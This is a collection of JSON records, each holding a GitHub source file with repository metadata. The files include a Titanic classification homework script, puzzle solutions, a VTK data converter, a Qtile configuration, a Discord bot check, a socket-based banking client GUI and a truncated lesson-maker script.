+{"seq_id":"73097507955","text":"# -*- coding:UTF-8 -*-\n\"\"\"\nTrain models and show the results\n@author: ZhaoHe\n\"\"\"\nimport os\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nfrom src.data import Data\nfrom src.config import train_path, test_path, submission_sample, submission_dir, images_dir\nfrom src.classifiers import classifier_xgboost, classifier_dicisionTree, classifier_SVM\nfrom src.clusters import cluster_KMeans, cluster_Hierarchical, cluster_Spectral\n\ndef get_submission(pred, model_name):\n submission_df = pd.read_csv(submission_sample, header=0)\n for i in range(len(pred)):\n submission_df.ix[i,'Survived'] = pred[i]\n out_file = os.path.join(submission_dir, model_name)\n submission_df.to_csv(out_file, index=False)\n\ndef pca(X_multi_dim):\n pca_model = PCA(n_components=2)\n X_2_dim = pca_model.fit_transform(X_multi_dim)\n return X_2_dim\n\ndef plot_result(pca_X, label_Y, title):\n class0_x, class0_y = [], []\n class1_x, class1_y = [], []\n for i in range(len(pca_X)):\n if label_Y[i] == 0:\n class0_x.append(pca_X[i][0])\n class0_y.append(pca_X[i][1])\n elif label_Y[i] == 1:\n class1_x.append(pca_X[i][0])\n class1_y.append(pca_X[i][1])\n plt.plot(class0_x, class0_y, 'or', label='No-Survived')\n plt.plot(class1_x, class1_y, 'ob', label='Survived')\n plt.title(title)\n plt.legend()\n plt.savefig(os.path.join(images_dir, title))\n plt.close()\n\n\ndef train_models(train_X, train_Y, test_X):\n # Classify using Xgboost\n pred_Y = classifier_xgboost(train_X, train_Y, test_X)\n get_submission(pred_Y, 'xgboost')\n\n # Classify using decisionTree\n pred_Y = classifier_dicisionTree(train_X, train_Y, test_X)\n get_submission(pred_Y, 'decisionTree')\n\n # Classify using SVM\n pred_Y = classifier_SVM(train_X, train_Y, test_X)\n get_submission(pred_Y, 'SVM')\n\n # Cluster using KMeans\n pred_Y = cluster_KMeans(train_X, test_X)\n get_submission(pred_Y, 'KMeans')\n\n # Cluster using Herichical\n pred_Y = cluster_Hierarchical(test_X)\n get_submission(pred_Y, 'Hierachical')\n\n # Cluster using Spectral\n pred_Y = cluster_Spectral(test_X)\n get_submission(pred_Y, 'Spectral')\n\ndef visualize_models(train_X, train_Y, test_X):\n # PCA on X\n new_train_X = pca(train_X)\n new_test_X = pca(test_X)\n\n # Visualize the train set\n plot_result(new_train_X, train_Y, 'Train Set')\n\n # Visualize the Xgboost\n sub_file = os.path.join(submission_dir, 'Xgboost')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'Xgboost')\n\n # Visualize the decisionTree\n sub_file = os.path.join(submission_dir, 'decisionTree')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'DecisionTree')\n\n # Visualize the SVM\n sub_file = os.path.join(submission_dir, 'SVM')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'SVM')\n\n # Visualize the KMeans\n sub_file = os.path.join(submission_dir, 'KMeans')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'KMeans')\n\n # Visualize the Hierachical\n sub_file = os.path.join(submission_dir, 'Hierachical')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'Hierahical')\n\n # Visualize the Spectral\n sub_file = os.path.join(submission_dir, 'Spectral')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 
'Spectral')\n\n\n\n\nif __name__ == \"__main__\":\n data = Data()\n train_X, train_Y = data.load_data(train_path)\n test_X = data.load_data(test_path, train = False)\n\n #train_models(train_X, train_Y, test_X)\n visualize_models(train_X, train_Y, test_X)","repo_name":"zhaohe1995/BIT2018-DataMiningHomework","sub_path":"Homework3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"44877835735","text":"n = int(input())\nmistakes = 0\ncorrectdict = {}\nfor i in range(n):\n x, s = input().split()\n correctdict[x] = s\nfor i in range(n):\n x,s = input().split()\n if sorted(correctdict[x]) != sorted(s):\n mistakes += 1\n \nprint(mistakes)","repo_name":"nikhiljsk/Programming","sub_path":"Competitive Prog/Hackerearth/cyphsept/hungryowleagle.py","file_name":"hungryowleagle.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"19233097341","text":"__author__ = 'jacob'\nimport pyvtk, math, os\nfrom glob import glob\nimport numpy\n#import visit_writer\n\nfilename = 'chymera_data.vtk'\ntitle = 'Test CHYMERA Output'\n\n\nNX = 256\nNZ = 66\nNY = 128\n\n\ndef BlendPoint(A, B, t):\n return [(1. - t) * A[0] + t * B[0], (1. - t) * A[1] + t * B[1], (1. - t) * A[2] + t * B[2]]\n\n\ndef GetMeshPoints(angle, angle2):\n p = []\n for k in range(NZ):\n z = float(k) / float(NZ - 1)\n for j in range(NY):\n y = float(j) / float(NY - 1)\n for i in range(NX):\n x = float(i) / float(NX - 1)\n A = [y * math.cos(angle), y * math.sin(angle), z]\n B = [y * math.cos(angle2), y * math.sin(angle2), z]\n p += BlendPoint(A, B, x)\n return p\n\n\ndef GetMeshConnectivity():\n c = []\n for k in range(NZ - 1):\n for j in range(NY - 1):\n for i in range(NX - 1):\n # Make a hole\n if i == 1 and j == 2:\n continue\n\n i0 = k * NY * NX + j * NX + i\n i1 = k * NY * NX + j * NX + (i + 1)\n i2 = k * NY * NX + (j + 1) * NX + (i + 1)\n i3 = k * NY * NX + (j + 1) * NX + i\n\n i4 = (k + 1) * NY * NX + j * NX + i\n i5 = (k + 1) * NY * NX + j * NX + (i + 1)\n i6 = (k + 1) * NY * NX + (j + 1) * NX + (i + 1)\n i7 = (k + 1) * NY * NX + (j + 1) * NX + i\n\n c.append([i0, i1, i2, i3, i4, i5, i6, i7])\n return c\n\n\ndef ReadGridData(filename):\n grid_data = []\n with open(filename, 'r') as data_file:\n for line in data_file:\n grid_data.append(float(line))\n return grid_data\n\n\ndef GetGridData():\n '''\n Gets the data from the output of binaryReader\n :return: A list of lists of grid data\n '''\n grid_data = []\n set_of_grids = glob(pathname=\"./GridData*.txt\")\n print(\"Getting Grid Data\")\n for grid in set_of_grids:\n grid_data.append(ReadGridData(grid))\n print(\"Finished GridData\")\n return grid_data\n\n\ndef GetMetaData():\n filename = os.path.join(\"MetaDataVTK.txt\")\n meta_data = ReadGridData(filename=filename)\n return meta_data\n\n\ndef WriteProxyDataset():\n filename = \"chymeraData.visit\"\n with open(filename, \"wt\") as all_data:\n all_data.write(\"!NBLOCKS 360\\n\")\n\n #f = open(\"test.visit\", \"wt\")\n #f.write(\"!NBLOCKS 360\\n\")\n # Get the mesh 6 times and add it all up.\n #all_pts = []\n #size_of_grid = NZ*NX*NY\n #connections_size = 8*size_of_grid\n #print(connections_size)\n #points_size = 3*size_of_grid\n # Create memmaps to deal with Python running out of memory\n #all_conn = numpy.memmap(os.path.join(\"/media/jacob/New Volume/\",\"connections.memmap\"), mode=\"w+\", dtype=\"int\", shape=(connections_size, connections_size))\n #all_pts = numpy.memmap(\"points.memmap\", mode=\"w+\", dtype=\"float16\", shape=(points_size, points_size))\n #all_var = []\n #pts_length = 0\n #conn_length = 0\n values = GetGridData()\n for i in range(360):\n pts = []\n conn = []\n angle = math.radians(float(i) * 1.)\n angle2 = math.radians(float(i + 1) * 1.)\n pts += GetMeshPoints(angle, angle2)\n conn += GetMeshConnectivity()\n var = []\n grid = pyvtk.UnstructuredGrid(points=pts, hexahedron=conn)\n print(\"Finished Unstructured Grid\")\n # Get the GridData\n end_point = int(i + (len(pts) - 1 / 3))\n print(int(i + ((len(pts) -1) / 3)))\n celldata = pyvtk.CellData(pyvtk.Scalars(values[0][i:end_point], name=\"data1\"),\n pyvtk.Scalars(values[1][i:end_point], name=\"data2\"),\n pyvtk.Scalars(values[2][i:end_point], name=\"data3\"),\n pyvtk.Scalars(values[3][i:end_point], name=\"data4\"),\n pyvtk.Scalars(values[4][i:end_point], name=\"data5\"),)\n\n vtk = pyvtk.VtkData(grid, celldata, title)\n vtk.tofile(\"chymera%d.vtk\\n\" % i)\n 
all_data.write(\"chymera%d\\n\" % i)\n print(\"Done in i range\" + str(i))\n\n\nWriteProxyDataset()","repo_name":"jacobbieker/chymera-vis","sub_path":"chymeraToVTK.py","file_name":"chymeraToVTK.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"26225827723","text":"from .universal import ContainerMeta\n\n\nclass LEVY_AREA_APPROXIMATIONS(metaclass=ContainerMeta): # noqa\n none = \"none\" # Don't compute any Levy area approximation\n space_time = \"space-time\" # Only compute an (exact) space-time Levy area\n davie = \"davie\" # Compute Davie's approximation to Levy area\n foster = (\n \"foster\" # Compute Foster's correction to Davie's approximation to Levy area\n )\n","repo_name":"DrownFish19/PaddleXDE","sub_path":"paddlexde/utils/sde_settings.py","file_name":"sde_settings.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"33638472355","text":"from datetime import date \n\narchivo = open(\"repaso/M2/nacidos.csv\")\nl = archivo.readlines()\naP = 1998\nl.pop(0)\n\nfor personas in l:\n pC = personas.find(\",\")\n aN = int(personas[pC+1:pC+5])\n mN = int(personas[pC+6:pC+8])\n dN = int(personas[pC+9:pC+11])\n fechaNac = date(aN,mN, dN)\n veranoInicio = date(aP-1, 12, 21)\n veranoFin = date(aP, 3, 20)\n if veranoInicio <= fechaNac <= veranoFin:\n print(personas[:-1])\n","repo_name":"pablokan/22prog1","sub_path":"repaso/M2/pr8.py","file_name":"pr8.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"74834036273","text":"import argparse\n\nimport pytest\nfrom support import timing\n\n\ndef compute(s):\n schedule = [x for x in s.splitlines()[1].split(\",\")]\n bus_ids = [int(x) for x in schedule if x != \"x\"]\n (step, t) = bus_ids[0], 0\n for b in bus_ids[1:]:\n while (t + schedule.index(str(b))) % b:\n t += step\n step *= b\n return t\n\n\n@pytest.mark.parametrize(\n ('input_s', 'expected'),\n (\n (\"\"\"123\n7,13,x,x,59,x,31,19\"\"\", 1068781),\n (\"\"\"123\n17,x,13,19\"\"\", 3417),\n (\"\"\"234\n1789,37,47,1889\"\"\", 1202161486),\n ),\n)\ndef test(input_s, expected):\n assert compute(input_s) == expected\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('data_file')\n args = parser.parse_args()\n\n with open(args.data_file) as f, timing():\n print(compute(f.read()))\n\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"itallix/advent-of-code-2020","sub_path":"day13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"22741683324","text":"from utils.custom_context import MyContext\nfrom ..settings.get_setting import get_setting\nfrom ..errors import NotManager, NoGiveawayPermissions\nfrom bot import MetroBot\n\nimport discord\nfrom discord.ext import commands\n\n\ndef giveaway_manager_check():\n async def predicate(ctx: MyContext):\n\n manager = await get_setting(ctx.bot, 'manager', ctx.guild.id)\n\n role = ctx.guild.get_role(manager) # manager can be none and this will still work\n if not role:\n if not ctx.author.guild_permissions.manage_guild:\n raise NoGiveawayPermissions(f'You need `Manage Guild` permissions to use this.')\n else:\n if not role in ctx.author.roles and not ctx.author.guild_permissions.manage_guild:\n raise NotManager(f'You need to be a giveaway manager (<@&{manager}>) to use this.')\n return True\n return commands.check(predicate)\n\nasync def giveaway_manager_check_interaction(bot: MetroBot, interaction: discord.Interaction,):\n \"\"\"Check if `Interaction.user` is a giveaway manager.\"\"\"\n manager = await get_setting(bot, 'manager', interaction.guild_id)\n\n role = interaction.guild.get_role(manager) # manager can be none and this will still work\n if not role:\n if not interaction.user.guild_permissions.manage_guild:\n await interaction.followup.send(f'You need `Manage Guild` permissions to use this.', ephemeral=True)\n return False\n else:\n if not role in interaction.user.roles and not interaction.user.guild_permissions.manage_guild:\n await interaction.followup.send(f'You need to be a giveaway manager (<@&{manager}>) to use this.', ephemeral=True)\n return False\n return True\n \n","repo_name":"dartmern/metro","sub_path":"cogs/giveaway_rewrite/checks/manager_check.py","file_name":"manager_check.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"39"}
+{"seq_id":"24028963834","text":"mutated_bat = genMonster(\"Mutated Bat\", 307, 9829)\nmutated_bat.health(900)\nmutated_bat.type(\"blood\")\nmutated_bat.defense(armor=20, fire=1, earth=0, energy=1, ice=1, holy=1, death=0, physical=1, drown=0)\nmutated_bat.experience(615)\nmutated_bat.speed(245)\nmutated_bat.behavior(summonable=0, hostile=True, illusionable=False, convinceable=0, pushable=False, pushItems=True, pushCreatures=True, targetDistance=1, runOnHealth=300)\nmutated_bat.walkAround(energy=0, fire=0, poison=0)\nmutated_bat.immunity(paralyze=1, invisible=1, lifedrain=1, drunk=1)\nmutated_bat.voices(\"Shriiiiiek\")\nmutated_bat.melee(169, condition=CountdownCondition(CONDITION_POISON, 6), conditionChance=100)\nmutated_bat.loot( (2148, 100, 130), (\"star herb\", 5.0), (\"rusty armor\", 13.0, 2), (\"battle shield\", 7.75), (\"obsidian lance\", 7.0), (\"bat wing\", 7.75, 3), (\"mutated bat ear\", 5.0), (\"energy ring\", 1.0), (\"small amethyst\", 0.75, 2), (\"black pearl\", 1.75, 3), (\"batwing hat\", 0.0025), (\"mercenary sword\", 0.0025), (\"black shield\", 0.0025) )","repo_name":"VAPus/PyOT-Legacy","sub_path":"data/monsters/Mammals/Mutated/Mutated Bat.py","file_name":"Mutated Bat.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"}
+{"seq_id":"1638052124","text":"import sys\n\ni = 0\nnomes={}\nfor s in sys.stdin:\n\tx = s.split()\n\tnomes[i] = []\n\tfor j in x:\n\t\tnomes[i].append(j)\n\ti+=1\n\nx = sorted(nomes.items(), key=lambda x: (len(x[1]),x[1])) # adiciona espacos nos nomes do meio\nfor i in range(len(x)):\n\tfor j in range(len(x[i][1])-1):\n\t\tx[i][1][j]+=' '\n\nl = len(x)\nfor y in x:\n\txx = y[1]\n\tfor i in range(len(xx)):\n\t\tsys.stdout.write(xx[i])\n\tprint\n\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","repo_name":"JoGomes19/LA2","sub_path":"Torneio1 - 20/nome.py","file_name":"nome.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"7526432539","text":"######################################################################\n\n# __ _ ___ _ _ #\n# /\\ \\ \\ ___ (_) ____ / __\\ ___ __| |(_) _ __ __ _ #\n# / \\/ // _ \\ | ||_ /_____ / / / _ \\ / _` || || '_ \\ / _` | #\n# / /\\ /| (_) || | / /|_____|/ /___| (_) || (_| || || | | || (_| | #\n# \\_\\ \\/ \\___/ |_|/___| \\____/ \\___/ \\__,_||_||_| |_| \\__, | #\n# |___/ #\n\n######################################################################\n\nfrom libqtile import bar, layout, widget\nfrom libqtile.config import Click, Drag, Group, Key, Match, Screen\nfrom libqtile.lazy import lazy\nfrom libqtile.utils import guess_terminal\nfrom qtile_extras import widget\nfrom qtile_extras.widget.decorations import PowerLineDecoration\n\nmod = \"mod4\"\nterminal = guess_terminal()\n\npowerline = {\n \"decorations\": [\n PowerLineDecoration(path=\"forward_slash\",\n size=7)\n ]\n}\n\nkeys = [\n Key([mod], \"h\", lazy.layout.left(), desc=\"Move focus to left\"),\n Key([mod], \"l\", lazy.layout.right(), desc=\"Move focus to right\"),\n Key([mod], \"j\", lazy.layout.down(), desc=\"Move focus down\"),\n Key([mod], \"k\", lazy.layout.up(), desc=\"Move focus up\"),\n Key([mod], \"m\", lazy.window.toggle_maximize(), desc=\"Toggle maximize windows\"),\n Key([mod], \"space\", lazy.layout.next(), desc=\"Move window focus to other window\"),\n Key([mod, \"shift\"], \"h\", lazy.layout.shuffle_left(), desc=\"Move window to the left\"),\n Key([mod, \"shift\"], \"l\", lazy.layout.shuffle_right(), desc=\"Move window to the right\"),\n Key([mod, \"shift\"], \"j\", lazy.layout.shuffle_down(), desc=\"Move window down\"),\n Key([mod, \"shift\"], \"k\", lazy.layout.shuffle_up(), desc=\"Move window up\"),\n Key([mod, \"control\"], \"h\", lazy.layout.grow_left(), desc=\"Grow window to the left\"),\n Key([mod, \"control\"], \"l\", lazy.layout.grow_right(), desc=\"Grow window to the right\"),\n Key([mod, \"control\"], \"j\", lazy.layout.grow_down(), desc=\"Grow window down\"),\n Key([mod, \"control\"], \"k\", lazy.layout.grow_up(), desc=\"Grow window up\"),\n Key([mod], \"n\", lazy.layout.normalize(), desc=\"Reset all window sizes\"),\n Key(\n [mod, \"shift\"],\n \"Return\",\n lazy.layout.toggle_split(),\n desc=\"Toggle between split and unsplit sides of stack\",\n ),\n Key([mod], \"Return\", lazy.spawn(\"kitty\"), desc=\"Launch terminal\"),\n Key([mod], \"Tab\", lazy.next_layout(), desc=\"Toggle between layouts\"),\n Key([mod], \"w\", lazy.window.kill(), desc=\"Kill focused window\"),\n Key([mod, \"control\"], \"r\", lazy.reload_config(), desc=\"Reload the config\"),\n Key([mod, \"control\"], \"q\", lazy.shutdown(), desc=\"Shutdown Qtile\"),\n Key([mod], \"r\", lazy.spawn(\"dmenu_run\"), desc=\"launch dmenu\"),\n Key([mod], \"s\", lazy.spawn(\"xfce4-settings-manager\"), desc=\"settings\"),\n\n #### APPS ####\n Key([mod], \"b\", lazy.spawn(\"brave\"), desc=\"Launches brave browser\"),\n Key([mod], \"c\", lazy.spawn(\"codium\"), desc=\"open vscode\"),\n Key([mod], \"q\", lazy.spawn(\"pcmanfm\"), desc=\"open file explorer\"),\n\n # Toggle keyboard layout\n Key([mod],\"f11\", lazy.widget[\"keyboardlayout\"].next_keyboard(), desc=\"Next keyboard layout\"),\n\n # Media\n Key([], \"XF86AudioLowerVolume\", lazy.spawn(\"amixer sset Master 2%-\"), desc=\"Lower Volume by 2%\"),\n Key([], \"XF86AudioRaiseVolume\", lazy.spawn(\"amixer sset Master 2%+\"), desc=\"Raise Volume by 2%\")\n]\n\ngroups = [Group(i) for i in \"1234567\"]\n\nfor i in groups:\n keys.extend(\n [\n Key(\n [mod],\n i.name,\n 
lazy.group[i.name].toscreen(),\n desc=\"Switch to group {}\".format(i.name),\n ),\n Key(\n [mod, \"shift\"],\n i.name,\n lazy.window.togroup(i.name, switch_group=True),\n desc=\"Switch to & move focused window to group {}\".format(i.name),\n ),\n ]\n )\n\nlayouts = [\n layout.Tile(\n margin = 12,\n border_focus=\"51E0F0\",\n border_width=2),\n]\n\nwidget_defaults = dict(\n font=\"sans\",\n fontsize=12,\n padding=3,\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(\n wallpaper=\"/home/noisefuck/Pictures/blue1.jpeg\",\n wallpaper_mode='fit',\n top=bar.Bar(\n [\n widget.GroupBox(font=\"sans Bold\",\n this_current_screen_border=\"51E0F0\",\n border_width=20),\n widget.Prompt(),\n widget.WindowName(foreground=\"51E0F0\",\n font=\"sans Bold\"),\n widget.Chord(\n chords_colors={\n \"launch\": (\"#ff0000\", \"#ffffff\"),\n },\n name_transform=lambda name: name.upper(),\n ),\n widget.Systray(),\n widget.Battery(background=[\"1F1F1F\"], # Just to create the last arrow effect\n foreground=\"131313\",\n fontsize=0.1,\n **powerline),\n widget.CheckUpdates(distro='Arch_checkupdates',\n update_interval=1800,\n display_format=\"🗘 : {updates}\",\n no_update_string=\"🗘 : 0\",\n font=\"sans Bold\",\n colour_no_updates=\"FFFFFF\",\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n **powerline),\n widget.CPU(format=\" {freq_current}GHz {load_percent}%\",\n foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Memory(measure_mem='G',\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Net(interface=\"enp8s0\",\n format='↑{up} ↓{down}',\n foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Clock(format=\"%d-%m %a %I:%M %p\",\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n font=\"sans Bold\",\n **powerline),\n widget.PulseVolume(foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.KeyboardLayout(configured_keyboards=['us','gr'],\n foreground=\"FFFFFF\",\n font=\"sans Bold\",\n background=\"51E0F0\",\n **powerline),\n ],\n 22, background=[\"1F1F1F\"],\n ),\n ),\n]\n\nmouse = [\n Drag([mod], \"Button1\", lazy.window.set_position_floating(), start=lazy.window.get_position()),\n Drag([mod], \"Button3\", lazy.window.set_size_floating(), start=lazy.window.get_size()),\n Click([mod], \"Button2\", lazy.window.bring_to_front()),\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: list\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(\n float_rules=[\n *layout.Floating.default_float_rules,\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n ]\n)\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\nreconfigure_screens = True\n\nauto_minimize = True\n\nwl_input_rules = None\n\nwmname = \"LG3D\"\n\n######################################################################\n\n# __ _ ___ _ _ #\n# /\\ \\ \\ ___ (_) ____ / __\\ ___ __| |(_) _ __ __ _ #\n# / \\/ // _ \\ | ||_ /_____ / / / _ \\ / _` || || '_ \\ / _` | #\n# / /\\ /| (_) || | / /|_____|/ /___| (_) || (_| || || | | || (_| | #\n# \\_\\ \\/ \\___/ |_|/___| \\____/ \\___/ \\__,_||_||_| |_| \\__, | #\n# |___/ 
#\n\n######################################################################\n","repo_name":"NoizCode/config","sub_path":"qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"73918520755","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'Yuanqin Lu'\n\nclass Solution(object):\n def search(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: bool\n \"\"\"\n length = len(nums)\n left, right = 0, length-1\n while left <= right:\n mid = (left + right) / 2\n if nums[mid] == target:\n return True\n while left < mid and nums[left] == nums[mid]:\n left += 1\n if nums[left] <= nums[mid]:\n if nums[left] <= target < nums[mid]:\n right = mid - 1\n else:\n left = mid + 1\n else:\n if nums[mid] < target <= nums[right]:\n left = mid + 1\n else:\n right = mid - 1\n return False\n\n","repo_name":"lisabug/leetcode","sub_path":"Python/081_search_in_rotated_sorted_array_II.py","file_name":"081_search_in_rotated_sorted_array_II.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"70158530034","text":"from socket import *\r\nimport PySimpleGUI as sg\r\nfrom time import sleep\r\n\r\n\r\nhost = gethostbyname(gethostname())\r\nport = 50000\r\n\r\n#conexão com o servidor\r\n\r\nclient = socket(AF_INET, SOCK_STREAM)\r\nclient.connect((host, port))\r\n\r\n#layout\r\n\r\nsoma = 0\r\nsaldo = 500\r\nfalha = 0\r\nopcao = 0\r\n\r\n\r\ndef menu():\r\n global opcao, saldo\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Clique na opção desejada:', size = (20, 2), font=16)],\r\n [sg.Button('Depositar', size = (30, 1), font=16)],\r\n [sg.Button('Sacar', size=(30, 1), font=16)],\r\n [sg.Button('Ver saldo', size=(30, 1), font=16)],\r\n [sg.Button('Sair')]\r\n ]\r\n\r\n menu = sg.Window('Eagle Bank', layout=layout, finalize= True)\r\n\r\n while True:\r\n eventos, valores = menu.read()\r\n if eventos == 'Sair' or sg.WINDOW_CLOSED:\r\n sg.popup('Finalizando...')\r\n break\r\n if eventos == 'Ver saldo':\r\n saldo = float(saldo)\r\n sg.popup(f'Seu saldo atual é: R${saldo:.2f}')\r\n if eventos == 'Depositar':\r\n opcao = 1\r\n client.send(str(opcao).encode())\r\n menu.hide()\r\n depositar()\r\n menu.un_hide()\r\n if eventos == 'Sacar':\r\n opcao = 2\r\n client.send(str(opcao).encode())\r\n menu.hide()\r\n sacar()\r\n menu.un_hide()\r\n\r\n\r\n menu.close()\r\n\r\n\r\ndef login():\r\n global soma\r\n sg.theme('DarkGrey2')\r\n layout = [\r\n [sg.Text('CPF', size = (11,1), font = 16)],\r\n [sg.InputText(key='login', font=10)],\r\n [sg.Text('Senha', size = (11, 1), font = 16)],\r\n [sg.InputText(key='senha', password_char= '*', font=10)],\r\n [sg.Button('Entrar'), sg.Button('Sair')]\r\n ]\r\n login = sg.Window('Eagle Bank', layout=layout, finalize=True)\r\n\r\n while True:\r\n eventos, valores = login.read()\r\n if eventos == 'Sair':\r\n sg.popup('Encerrando.')\r\n null = '0'\r\n client.send(null.encode())\r\n client.send(null.encode())\r\n break\r\n if eventos == 'Entrar':\r\n username = valores['login']\r\n password = valores['senha']\r\n client.send(username.encode())\r\n client.send(password.encode())\r\n msg = client.recv(1024).decode()\r\n if msg == 'Logado com sucesso':\r\n sg.popup('Autenticação concluída!')\r\n login.hide()\r\n menu()\r\n break\r\n elif msg != 'Logado com sucesso':\r\n sg.popup('Credenciais incorretas!')\r\n soma = soma + 1\r\n if soma == 3:\r\n sg.popup('Número de tentativas excedido. 
\\n Finalizando...')\r\n sleep(1.5)\r\n client.close()\r\n break\r\n login.close()\r\n\r\n\r\ndef depositar():\r\n global saldo\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Valor a ser depositado: ', size=(16,1), font=16)],\r\n [sg.InputText(key='valor', font=11)],\r\n [sg.Button('Confirmar'), sg.Button('Voltar')],\r\n ]\r\n\r\n depositar = sg.Window('Eagle Bank', layout=layout, finalize = True)\r\n\r\n while True:\r\n eventos, valores = depositar.read()\r\n if 'Confirmar':\r\n valor = valores['valor']\r\n client.send(valor.encode())\r\n valor = client.recv(1024).decode()\r\n valor = float(valor)\r\n saldo = valor\r\n sg.popup(f'Valor em conta atualizado: R${valor:.2f}')\r\n break\r\n depositar.close()\r\n\r\n\r\ndef sacar():\r\n global saldo, valor\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Valor a ser sacado: ', size=(10,1), font=16)],\r\n [sg.Input(key='valor', font=11)],\r\n [sg.Button('Confirmar'), sg.Button('voltar')]\r\n ]\r\n\r\n sacar = sg.Window('Eagle Bank', layout=layout, finalize=True)\r\n\r\n while True:\r\n eventos, valores = sacar.read()\r\n if eventos == 'Confirmar':\r\n valor = valores['valor']\r\n client.send(valor.encode())\r\n print(saldo)\r\n saldo = client.recv(1024).decode()\r\n print(saldo)\r\n saldo = float(saldo)\r\n print(saldo)\r\n sg.popup(f'Seu saldo atualizado é de R${saldo}')\r\n break\r\n sacar.close()\r\n\r\n\r\n#criar um bloco de leitura de eventos\r\nlogin()\r\n\r\n","repo_name":"Ekaly/vscode","sub_path":"Cliente.py","file_name":"Cliente.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"3318258404","text":"from django.urls import path\nfrom .views import AddStudentView, DetectionView, UpdateStudentImageView, DeleteStudentView, TrainView\n\nurlpatterns = [\n path('create-student', AddStudentView.as_view()),\n path('update-student-image', UpdateStudentImageView.as_view()),\n path('delete-student', DeleteStudentView.as_view()),\n path('train', TrainView.as_view()),\n path('detect', DetectionView.as_view())\n]\n","repo_name":"ruizhiwang11/face_reco_attendence_system","sub_path":"backend/face_reco_attendence_system/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"36926069312","text":"############################\n# LESSON MAKER FOR STUYCCC #\n############################\n\n########## The lesson maker syntax ##########\n#\n# First line should be lesson title\n# Text without preceding formatter will be treated as plaintext in a
tag\n# A blank line will be treated as a tag\n#\n# Open an ordered list with \"!!olist!!\"\n# Close an ordered list with \"!!endolist!!\"\n#\n# Open an unordered list with \"!!ulist!!\"\n# Close an unordered list with \"!!endulist!!\"\n#\n# Add an image with \"image()\" --> absolute dir, not relative\n#\n# Add a link with \"a[]()\"\n#\n# Add your own custom html between \"!!html!!\" and \"!!endhtml!!\"\n#\n# start a heading with !!h!!. It will be one line\n#\n# <, >, &, and TABs will automatically be replaced with their html equivalents\n#\n# For spacing, use !!breaks!!, being the number of breaks you want\n#\n# others shall be added l8r\n#\n#############################################\n\nimport re\n\ndef go():\n #take filename input and read it\n f = input(\"Input filename: \")\n straw = open(f, 'r')\n pretext = straw.read()\n straw.close()\n\n #start html file\n html = \"\"\n\n #replace >, <, &, and TABs\n pretext = pretext.replace('&', '&')\n pretext = 